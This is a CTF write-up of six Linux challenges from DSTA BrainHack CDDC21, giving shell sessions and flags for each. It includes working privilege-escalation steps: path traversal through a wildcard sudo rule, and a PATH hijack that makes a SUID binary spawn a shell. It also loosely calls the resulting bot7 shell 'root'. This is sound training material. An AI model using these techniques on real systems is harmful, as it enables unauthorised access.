👨‍💻
CTFs
HomePlaygroundOSCPBuy Me a Flag 🚩
  • 🚩Zeyu's CTF Writeups
  • Home
  • Playground
  • OSCP
  • My Challenges
    • SEETF 2023
    • The InfoSecurity Challenge 2022
    • SEETF 2022
    • Cyber League Major 1
    • STANDCON CTF 2021
      • Space Station
      • Star Cereal
      • Star Cereal 2
      • Mission Control
      • Rocket Science
      • Space University of Interior Design
      • Rocket Ship Academy
      • Space Noise
  • 2023
    • DEF CON CTF 2023 Qualifiers
    • hxp CTF
      • true_web_assembly
    • HackTM CTF Qualifiers
      • Crocodilu
      • secrets
      • Hades
  • 2022
    • niteCTF 2022
      • Undocumented js-api
      • js-api
    • STACK the Flags 2022
      • Secret of Meow Olympurr
      • The Blacksmith
      • GutHib Actions
      • Electrogrid
      • BeautyCare
    • LakeCTF Qualifiers
      • People
      • Clob-Mate
      • So What? Revenge
    • The InfoSecurity Challenge 2022
      • Level 1 - Slay The Dragon
      • Level 2 - Leaky Matrices
      • Level 3 - PATIENT0
      • Level 4B - CloudyNekos
      • Level 5B - PALINDROME's Secret (Author Writeup)
    • BalsnCTF 2022
      • 2linenodejs
      • Health Check
    • BSidesTLV 2022 CTF
      • Smuggler
      • Wild DevTools
      • Tropical API
    • Grey Cat The Flag 2022
    • DEF CON CTF 2022 Qualifiers
    • Securinets CTF Finals 2022
      • StrUggLe
      • XwaSS ftw?
      • Strong
      • Artist
    • NahamCon CTF 2022
      • Flaskmetal Alchemist
      • Hacker TS
      • Two For One
      • Deafcon
      • OTP Vault
      • Click Me
      • Geezip
      • Ostrich
      • No Space Between Us
    • Securinets CTF Quals 2022
      • Document-Converter
      • PlanetSheet
      • NarutoKeeper
    • CTF.SG CTF
      • Asuna Waffles
      • Senpai
      • We know this all too well
      • Don't Touch My Flag
      • Wildest Dreams Part 2
      • Chopsticks
    • YaCTF 2022
      • Shiba
      • Flag Market
      • Pasteless
      • Secretive
      • MetaPDF
      • Crackme
    • DiceCTF 2022
      • knock-knock
      • blazingfast
    • TetCTF 2022
      • 2X-Service
      • Animals
      • Ezflag Level 1
  • 2021
    • hxp CTF 2021
    • HTX Investigator's Challenge 2021
    • Metasploit Community CTF
    • MetaCTF CyberGames
      • Look, if you had one shot
      • Custom Blog
      • Yummy Vegetables
      • Ransomware Patch
      • I Hate Python
      • Interception
    • CyberSecurityRumble CTF
      • Lukas App
      • Finance Calculat0r 2021
      • Personal Encryptor with Nonbreakable Inforation-theoretic Security
      • Enterprice File Sharing
      • Payback
      • Stonks Street Journal
    • The InfoSecurity Challenge (TISC) 2021
      • Level 4 - The Magician's Den
      • Level 3 - Needle in a Greystack
      • Level 2 - Dee Na Saw as a need
      • Level 1 - Scratching the Surface
    • SPbCTF's Student CTF Quals
      • 31 Line PHP
      • BLT
      • CatStep
    • Asian Cyber Security Challenge (ACSC) 2021
      • Cowsay As A Service
      • Favorite Emojis
      • Baby Developer
      • API
      • RSA Stream
      • Filtered
      • NYONG Coin
    • CSAW CTF Qualification Round 2021
      • Save the Tristate
      • securinotes
      • no pass needed
      • Gatekeeping
      • Ninja
    • YauzaCTF 2021
      • Yauzacraft Pt. 2
      • Yauzabomber
      • RISC 8bit CPU
      • ARC6969 Pt. 1
      • ARC6969 Pt. 2
      • Back in 1986 - User
      • Lorem-Ipsum
    • InCTF 2021
      • Notepad 1 - Snakehole's Secret
      • RaaS
      • MD Notes
      • Shell Boi
      • Listen
      • Ermittlung
      • Alpha Pie
    • UIUCTF 2021
      • pwnies_please
      • yana
      • ponydb
      • SUPER
      • Q-Rious Transmissions
      • capture the :flag:
      • back_to_basics
      • buy_buy_buy
    • Google CTF 2021
      • CPP
      • Filestore
    • TyphoonCon CTF 2021
      • Clubmouse
      • Impasse
    • DSTA BrainHack CDDC21
      • File It Away (Pwn)
      • Linux Rules the World! (Linux)
      • Going Active (Reconnaissance)
      • Behind the Mask (Windows)
      • Web Takedown Episode 2 (Web)
      • Break it Down (Crypto)
    • BCACTF 2.0
      • L10N Poll
      • Challenge Checker
      • Discrete Mathematics
      • Advanced Math Analysis
      • Math Analysis
      • American Literature
      • More Than Meets the Eye
      • 􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉
    • Zh3ro CTF V2
      • Chaos
      • Twist and Shout
      • 1n_jection
      • alice_bob_dave
      • Baby SSRF
      • bxxs
      • Sparta
    • Pwn2Win CTF 2021
      • C'mon See My Vulns
      • Illusion
    • NorzhCTF 2021
      • Leet Computer
      • Secure Auth v0
      • Triskel 3: Dead End
      • Triskel 2: Going In
      • Triskel 1: First Contact
      • Discovery
    • DawgCTF 2021
      • Bofit
      • Jellyspotters
      • No Step On Snek
      • Back to the Lab 2
      • MDL Considered Harmful
      • Really Secure Algorithm
      • The Obligatory RSA Challenge
      • Trash Chain
      • What the Flip?!
      • Back to the Lab 1
      • Back to the Lab 3
      • Dr. Hrabowski's Great Adventure
      • Just a Comment
      • Baby's First Modulation
      • Two Truths and a Fib
    • UMDCTF 2021
      • Advantageous Adventures
      • Roy's Randomness
      • Whose Base Is It Anyway
      • Cards Galore
      • Pretty Dumb File
      • Minetest
      • Donnie Docker
      • Subway
      • Jump Not Easy
      • To Be XOR Not To Be
      • Office Secrets
      • L33t M4th
      • Bomb 2 - Mix Up
      • Jay
    • Midnight Sun CTF 2021
      • Corporate MFA
      • Gurkburk
      • Backups
    • picoCTF 2021
      • It Is My Birthday (100)
      • Super Serial (130)
      • Most Cookies (150)
      • Startup Company (180)
      • X marks the spot (250)
      • Web Gauntlet (170 + 300)
      • Easy Peasy (40)
      • Mini RSA (70)
      • Dachshund Attacks (80)
      • No Padding, No Problem (90)
      • Trivial Flag Transfer Protocol (90)
      • Wireshark twoo twooo two twoo... (100)
      • Disk, Disk, Sleuth! (110 + 130)
      • Stonks (20)
    • DSO-NUS CTF 2021
      • Insecure (100)
      • Easy SQL (200)
Powered by GitBook
On this page
  • Lock and Key
  • License to Run
  • Historian
  • Line Inspection
  • Super
  • Path to Win

Was this helpful?

  1. 2021
  2. DSTA BrainHack CDDC21

Linux Rules the World! (Linux)

Lock and Key

We are given a private RSA key file. We can use ssh-keygen -p to change the passphrase.

root@no:~/Downloads# chmod 600 cybot01_bot1.key 
root@no:~/Downloads# ssh-keygen -p -f cybot01_bot1.key 
Key has comment 'bot1@ip-172-31-34-218'
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved with the new passphrase.
root@no:~/Downloads# ssh -i cybot01_bot1.key bot1@13.213.91.240

Once in, the flag is in the home directory.

CDDC21{b0t_eNtR3nC3}

License to Run

The challenge description hinted at some malicious file that can be run. I looked for all the files that were executable by bot2, and found an interesting file in the home directory.

bot2@cybot01:/$ find / -executable -type f 2>/dev/null | grep flag
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/rename_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/rename_flags.sh
/home/bot2/.#flag$!!1

Running this file gives us the flag.

bot2@cybot01:~$ ./.#flag\$\!\!1 
CDDC21{TH4nKsF0R_p3RM}

Historian

In the .viminfo file, a secret file location is revealed. The /usr/local/share/secret file contains the flag.

bot3@cybot01:~$ ls -la
total 24
dr-xr-x---  2 root bot3 4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5 4096 Jun 18 09:51 ..
lrwxrwxrwx  1 root root    9 Jun 18 09:51 .bash_history -> /dev/null
-r--r-----  1 bot3 bot3  220 Feb 25  2020 .bash_logout
-r--r-----  1 bot3 bot3 3771 Feb 25  2020 .bashrc
-r--r-----  1 bot3 bot3  807 Feb 25  2020 .profile
-rwx------  1 bot3 root  794 Jun 23 10:34 .viminfo

bot3@cybot01:~$ cat .viminfo
...

# File marks:
'0  1  15  /usr/local/share/secret
4,48,1,15,1620820231,"/usr/local/share/secret'

...

bot3@cybot01:~$ cat /usr/local/share/secret
CDDC21{V1m_th3_s4vior}

Line Inspection

There is a random-secrets file with lots of gibberish. Grepping the CDDC substring gives us the flag.

bot4@cybot01:~$ cat random-secrets | grep CDDC
CDDC21{gRe3EpL1nG}

Super

We are allowed to run /usr/bin/cat /var/log/* as bot6 with no password.

bot5@cybot01:~$ sudo -l
Matching Defaults entries for bot5 on cybot01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bot5 may run the following commands on cybot01:
    (bot6 : bot6) NOPASSWD: /usr/bin/cat /var/log/*

We can use path traversal to get the flag:

bot5@cybot01:~$ sudo -u bot6 cat /var/log/../../../home/bot5/flag.txt
CDDC21{b3w4r3sud03rz}

Path to Win

There is a systeminfo binary in the home directory.

bot6@cybot01:~$ ls -la
total 44
dr-xr-x---  2 root bot6  4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5  4096 Jun 18 09:51 ..
lrwxrwxrwx  1 root root     9 Jun 18 09:51 .bash_history -> /dev/null
-r--r-----  1 bot6 bot6   220 Feb 25  2020 .bash_logout
-r--r-----  1 bot6 bot6  3771 Feb 25  2020 .bashrc
-r--r-----  1 bot6 bot6   807 Feb 25  2020 .profile
-r--------  1 bot7 root    31 Jun 18 09:51 flag.txt
-r-sr-xr-x  1 bot7 root 17008 Jun 18 09:51 systeminfo

Running it gives the following output.

bot6@cybot01:~$ ./systeminfo
System information...

[*] Date:
Wed Jun 23 15:06:18 UTC 2021

[*] Kernel:
5.8.0-1035-aws

[*] User infomation:
uid=1007(bot7) gid=1006(bot6) groups=1006(bot6),1005(bot5)

We can deduce that the systeminfo binary calls id. Note that since systeminfo has SUID permissions, it runs as bot7. If the id call does not use an absolute path, then we can perform PATH variable manipulation to force the execution of our custom payload.

This time, running systeminfo gives us a shell as root.

bot6@cybot01:~$ cd /tmp
bot6@cybot01:/tmp$ echo /bin/sh > id
bot6@cybot01:/tmp$ chmod 777 id
bot6@cybot01:/tmp$ export PATH=/tmp:$PATH
bot6@cybot01:/tmp$ /home/bot6/systeminfo
System information...

[*] Date:
Wed Jun 23 15:07:48 UTC 2021

[*] Kernel:
5.8.0-1035-aws

[*] User infomation:
$ pwd
/tmp
$ cd /home/bot6
$ cat flag.txt
CDDC21{SU!d_!s_Qu!Te_DngeRouS}
PreviousFile It Away (Pwn)NextGoing Active (Reconnaissance)

Last updated 3 years ago

Was this helpful?